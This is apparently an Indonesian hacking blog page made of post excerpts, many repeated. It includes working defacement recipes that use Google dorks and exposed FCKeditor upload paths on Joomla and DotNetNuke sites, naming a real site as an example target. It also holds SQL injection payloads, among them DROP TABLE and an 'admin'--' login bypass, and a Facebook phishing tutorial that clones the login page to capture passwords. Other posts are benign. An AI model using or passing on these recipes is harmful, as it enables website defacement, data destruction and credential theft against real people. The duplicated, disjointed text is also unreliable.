- cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
- kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
ype=File&Connector=connectors/php/connector.php maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt.
Joomla mambots File Upload Vulnerability
Deface Ala DotNetNuke Exploit
1. Siapkan file deface anda
2.mencari target web
dork >> inurl:”/portals/0″
search di google...!!
3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.sitetarget.org/portals/0/News.htm << Target sekarang ganti "portals/0/News.htm" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
2.mencari target web
dork >> inurl:”/portals/0″
search di google...!!
3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.sitetarget.org/portals/0/News.htm << Target sekarang ganti "portals/0/News.htm" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Apakah Loe Pantas disebut Hacker ??
<!-- / icon and title --> <!-- message -->
Maaf sebelumnya kalo tulisan saya ini membuat anda tersinggung
Setiap hari exploit demi exploit terus di publikasi di situs² underground para hacker., Setiap hari selalu aja gw liat satu persatu situs mulai berjatuhan dan halaman index mereka telah berubah secara frontal dengan background rata² berwarna hitam dengan tulisan “Hacked by”!!, Mereka yg mulai kenal dengan istilah Hacker mulai mencari berpuluh puluh tutorial di internet tentang cara mendeface situs., mencoba bertanya di milis., forum., hingga bertanya langsung pada sang defacer via chating., dan mereka hanya mendapatkan jawaban “saya bukan hacker kaka”, “Hacker apaan sey omz”, “saya cupu om, ga bisa apa², salah orang situ klo nanya sama saya”!!, yap.., sebuah statement merendahkan diri menaikan mutu dari seorang defacer kacangan yg mengaku hacker., 4 tahun lebih gw terjun di dunia perhackingan., dan melihat scene hacking khususnya di indonesia., apa yg gw liat tentang hacking situs selama ini di lakukan bukan oleh seorang hacker., bahkan seorang kracker., mereka hanya seorang script kiddies yg hanya menyombongkan diri dari hasil deface mereka., dan mereka berbangga dalam hati mereka dan menyebut diri mereka “I am Hacker”…._
Maaf sebelumnya kalo tulisan saya ini membuat anda tersinggung
Setiap hari exploit demi exploit terus di publikasi di situs² underground para hacker., Setiap hari selalu aja gw liat satu persatu situs mulai berjatuhan dan halaman index mereka telah berubah secara frontal dengan background rata² berwarna hitam dengan tulisan “Hacked by”!!, Mereka yg mulai kenal dengan istilah Hacker mulai mencari berpuluh puluh tutorial di internet tentang cara mendeface situs., mencoba bertanya di milis., forum., hingga bertanya langsung pada sang defacer via chating., dan mereka hanya mendapatkan jawaban “saya bukan hacker kaka”, “Hacker apaan sey omz”, “saya cupu om, ga bisa apa², salah orang situ klo nanya sama saya”!!, yap.., sebuah statement merendahkan diri menaikan mutu dari seorang defacer kacangan yg mengaku hacker., 4 tahun lebih gw terjun di dunia perhackingan., dan melihat scene hacking khususnya di indonesia., apa yg gw liat tentang hacking situs selama ini di lakukan bukan oleh seorang hacker., bahkan seorang kracker., mereka hanya seorang script kiddies yg hanya menyombongkan diri dari hasil deface mereka., dan mereka berbangga dalam hati mereka dan menyebut diri mereka “I am Hacker”…._
TUTORIAL SCHEMAFUZZ
Tool:
1.Python
2.Schemafuzz
3.CMD
Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...
1.Python
2.Schemafuzz
3.CMD
Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...
Teknik Deface dengan menggunakan Web Folder
Kita mungkin pernah melihat halaman yang terkena aksi jahil terhadap situs tertentu oleh para defacer.
Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu.
Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.
Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste.
Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu.
Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.
Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste.
Yahoo Mail Crack
|–[2. Bugs pada Yahoo Mail
—————————
Yahoo Mail (http://mail.yahoo.com) memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan mailbox yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan penyedia layanan email berbasis web gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Yahoo!
Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna Yahoo Mail bisa sedikit berlega hati karena Yahoo telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:
—————————
Yahoo Mail (http://mail.yahoo.com) memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan mailbox yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan penyedia layanan email berbasis web gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Yahoo!
Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna Yahoo Mail bisa sedikit berlega hati karena Yahoo telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:
Daftar Nama Domain Di Seluruh Dunia
A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Ã…land
.az – Azerbaijan
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Ã…land
.az – Azerbaijan
Simple SQL Injection Advance
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
Facebook Phising For Newbie
Today we are going to make a phisher for facebook.
1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:
1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important
9) make a new file in notepad, and put this code:
Hacker Tools
WINDOWS
Top 100 Network Security Tools
After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”.
SEJARAH BERDIRINYA GOOGLE
Hari ini siapa yang tidak mengenal Google? Raksasa Internet yang satu ini lambat laun semakin populer di dunia internet dan semakin jauhmeninggalkan pesaing – pesaingya. Dengan kurang lebih 20000 pekerja full time saat ini, Google selalu mengeluarkan inovasi dan produk baru yang semakin lama semakin sulit tersaingi oleh kompetitornya.
Cara Mudah Menjebol Password Deep Freeze 6
Sesuai dengan dinamika dan perkembangan jaman - banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.
Lindungi karyamu dari plagiator
Pernahkah source code website atau blog kamu di salin oleh orang lain? atau jangan-jangan kamu sendiri yang menduplikasinya hehehe.
Jengkel rasanya jika hasil karya kita diambil oleh orang lain, apalagi kalau dia mengaku sebagai penciptanya.
Maka dari itu jika kamu mempunyai website atau blog, jangan lupa untuk meng-enkripsinya agar tidak mudah disalin oleh orang yang tidak bertanggung jawab.
Sekadar berbagi, saya ga sengaja menemukan website yang menyediakan layanan berbagai jenis enkripsi dan dekripsi.
Dengan menggunakan layanan dari web tersebut kamu bisa melindungi hasil karyamu agar tidak di salin oleh orang lain.
Alamatnya ada dibawah ini
http://crypo.com/
Selamat Mencoba dan semoga bermanfaat
Jengkel rasanya jika hasil karya kita diambil oleh orang lain, apalagi kalau dia mengaku sebagai penciptanya.
Maka dari itu jika kamu mempunyai website atau blog, jangan lupa untuk meng-enkripsinya agar tidak mudah disalin oleh orang yang tidak bertanggung jawab.
Sekadar berbagi, saya ga sengaja menemukan website yang menyediakan layanan berbagai jenis enkripsi dan dekripsi.
Dengan menggunakan layanan dari web tersebut kamu bisa melindungi hasil karyamu agar tidak di salin oleh orang lain.
Alamatnya ada dibawah ini
http://crypo.com/
Selamat Mencoba dan semoga bermanfaat
Binari dan Hexadecimal
Bilangan berbasis 16 dengan urutan angkanya sebagai berikut 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F. Dengan demikian, seperti terlihat A pada hexadecimal identik dengan 10 pada desimal atau bilangan berbasis sepuluh.
Bilangan hexadecimal ini merupakan dasar untuk perancangan program-program berbasis bahasa mesin.
Bilangan hexadecimal ini merupakan dasar untuk perancangan program-program berbasis bahasa mesin.
Cara Membuat Jaringan Komputer (LAN/Local Area Network)
Jaringan komputer? emang apa sih jaringan itu? kita sering dengar tapi kadang, yang kita tahu hanya sedikit saja. bisa kita analogikan seperti jaringan di tubuh kita (jaringan sel). di tubuh kita, setiap perangkat yang ada saling terhubung, dengan fungsi untuk saling bekerja sama, walaupun setiap perangkatnya memiliki fungsi sendiri-sendiri.
T E L N E T
Berikut sedikit tips cara penggunaan TELNET untuk remote komputer pada jaringan LAN. Telnet bekerja pada port 23 untuk menggunakan telnet pada jaringan LAN pastikan dahulu jaringan LAN sudah saling terhubung satu dengan yang lain.pada artikel ini membahas penggunaan telnet pada windows XP,untuk menggunakan telnet pada windows xp silakan anda aktifkan dahulu service telnet adapun caranya sebagai berikut:
Black hat hacker
Black hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada para peretas yang menerobos keamanan sistem komputer tanpa izin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk mengacu kepada peretas dalam arti ini.
White hat hacker
White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.
Langganan:
Postingan (Atom)